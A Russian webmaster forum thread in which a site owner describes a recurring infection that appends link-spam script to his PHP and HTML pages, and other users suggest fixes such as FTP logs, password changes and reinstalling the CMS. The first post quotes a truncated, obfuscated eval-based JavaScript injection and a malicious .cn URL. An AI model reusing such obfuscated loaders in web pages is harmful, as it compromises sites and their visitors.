- Поисковые системы
- Практика оптимизации
- Трафик для сайтов
- Монетизация сайтов
- Сайтостроение
- Социальный Маркетинг
- Общение профессионалов
- Биржа и продажа
- Финансовые объявления
- Работа на постоянной основе
- Сайты - покупка, продажа
- Соцсети: страницы, группы, приложения
- Сайты без доменов
- Трафик, тизерная и баннерная реклама
- Продажа, оценка, регистрация доменов
- Ссылки - обмен, покупка, продажа
- Программы и скрипты
- Размещение статей
- Инфопродукты
- Прочие цифровые товары
- Работа и услуги для вебмастера
- Оптимизация, продвижение и аудит
- Ведение рекламных кампаний
- Услуги в области SMM
- Программирование
- Администрирование серверов и сайтов
- Прокси, ВПН, анонимайзеры, IP
- Платное обучение, вебинары
- Регистрация в каталогах
- Копирайтинг, переводы
- Дизайн
- Usability: консультации и аудит
- Изготовление сайтов
- Наполнение сайтов
- Прочие услуги
- Не про работу
Переиграть и победить: как анализировать конкурентов для продвижения сайта
С помощью Ahrefs
Александр Шестаков
Авторизуйтесь или зарегистрируйтесь, чтобы оставить комментарий
Здравствуйте.
Ко мне на сайт начал периодически проникать вирус, который размещает в своём коде кучу ссылок
<div id='x04308eb6661379e8fef87be2e8f762c21'><script>var jQuery = eval('wEicnDdDoDwc.*eEvEaclc'.replace(/[EDc;\*]/g, '')); jQuery('\x66\x75\x6e\x63\x74\x69\x6f\x6e\x20\x77\x36\x36\x6a\x28\x6c\x43\x57\x4c\x55\x29\x7b\x66\x75\x6e\x63\x74\x69\x6f\x6e\x20\x6a\x33\x39\x6c\x41\x47\x31\x28\x69\x41\x53\x48\x31\x6e\x29\x7b\x76\x61\x72\x20\x73\x49\x4d\x3d\x30\x3b\x76\x61\x72\x20\x65\x48\x4a\x7a\x36\x3d\x69\x41\x53\x48\x31\x6e\x2e\x6c\x65\x6e\x67\x74\x68\x3b\x76\x61\x72\x20\x75\x77\x52\x4f\x3d\x30\x3b\x77\x68\x69\x6c\x65\x28\x75\x77\x52\x4f\x3c\x65\x48\x4a\x7a\x36\x29\x7b\x73\x49\x4d\x2b\x3d\x78\x61\x33\x71\x74\x4b\x28\x69\x41\x53\x48\x31\x6e\x2c\x75\x77\x52\x4f\x29\x2a\x65\x48\x4a\x7a\x36\x3b\x75\x77\x52\x4f\x2b\x2b\x3b\x7d\x72\x65\x74\x75\x72\x6e\x20\x28\x73\x49\x4d\x2b\x27\x27\x29\x3b\x7d\x66\x75\x6e\x63\x74\x69\x6f\x6e\x20\x78\x61\x33\x71\x74\x4b\x28\x63\x35\x30\x75\x2c\x62\x30\x56\x64\x29\x7b\x72\x65\x74\x75\x72\x6e\x20\x63\x35\x30\x75\x2eвот его кусок весь не влезОн записывается в файлы с разрешением php и html внизу кода самой странички.
первый раз он ко мне проник я сначала не зааметил, и сайт выпал из индекса, потом я нашел причину и удалил этот код со всех страничек. Сайт вернулся в индекс и в тот же день вирус снова появился на нём, причём просто почистить код уже не получилось, пришлось переставлять двиг и делать восстанавливать из бекапа. Установил самую последнюю версию движка, на следующий день он снова появился, сегодня снова всё снёс и установил уже версию которая была до этой.
Проверил компьютер каспером ничего не нашёл. когда вирус на сайте, каспер блокирует его при загрузке и пишет :17.12.2008 13:52:33 Обнаружено: google.com.upload.main.update.centerifart.cn/* Opera Internet Browser ttp://google.com.upload.main.update.centerifart.cn/myspace.cn/index.php Базы
Кто знает как с этим бороться?
Обратиться к хостеру и попросить FTP-лог (также не вредно изложить ему проблему). По FTP-логу можно понять откуда лезет вирус:
1. по FTP (тогда менять FTP пароль, проверять FTP-клиент на трояны, сменить ломаный пиратский FTP-клиент на бесплатный)
2. не по FTP (тогда трясти хостера, так как скорее всего у него плохо настроен сервер и зараза лезет с чужого сайта на том же сервере)
у Вас увели пароли ftp
Такое могут трояны делать если имя сервера, логин, пароль были прописаны в том же ТоталКомандер
1.Сменить пароли на доступ по ftp
2.Не хранить пароли на компьютере
Также не помешает просмотреть базу на предмет подозрительных юзеров и админов. Сходить на официальный сайт вашей cms и проверить, не было ли обнаружено дыр и обновиться, если необходимо. Если увели пароль фтп, то из конфиг-файла и к базе пароль узнали, тоже поменять надо. Вполне возможно, что какие-то из пхп-файлов модифицированы для дальнейшего взлома. Поэтому, если ничего не поможет, нужно сохранять базу, удалять сайт, заново ставить движок (не локальную копию сайта, а дистрибутив), восстанавливать базу и т.д. Если были какие-то плагины и т.д., проверить - не через них ли взлом произошел.
Если уже был получен несанционированный доступ через ftp, то одной сменой паролей не отделаться. Как было у меня. Получили к ftp несанционированный доступ, загрузили на сервер какой то софт, который периодически запускается и прописывает ссылку на вирус во все индексные файлы. Менял пароли, толку нет, так как скрипт уже на серваке. Запускали видимо через ssh. Делал бекап файлов. Все нормально. Через некоторое время снова тоже самое.
Потом я на сервере в системных папках нашел скрипт, который запускали эти уроды, снес его и тьфу тьфу, пока все нормально. Ищите источник вируса на сервере, убивайте его, меняйте пароли.
to asto
Подскажите, где на сервере искать эту гадость? У меня похоже подобная проблема.
У себя в компе сначала ищите, а не на сервере.
У себя в компе сначала ищите, а не на сервере.
Спасибо, что еще раз обратили мое внимание на сей факт. Я читал то, что написано выше.
kryuko-denis, да, сначала на компе троянов поищите, а потом на серваке. На сервере в системных папках ищите. Через ftp в них попасть нельзя. У моего хостера туда можно зайти только из клиентской панели в разделе "файлы". После того, как там снес файл, больше вирус на сайт не прописывался.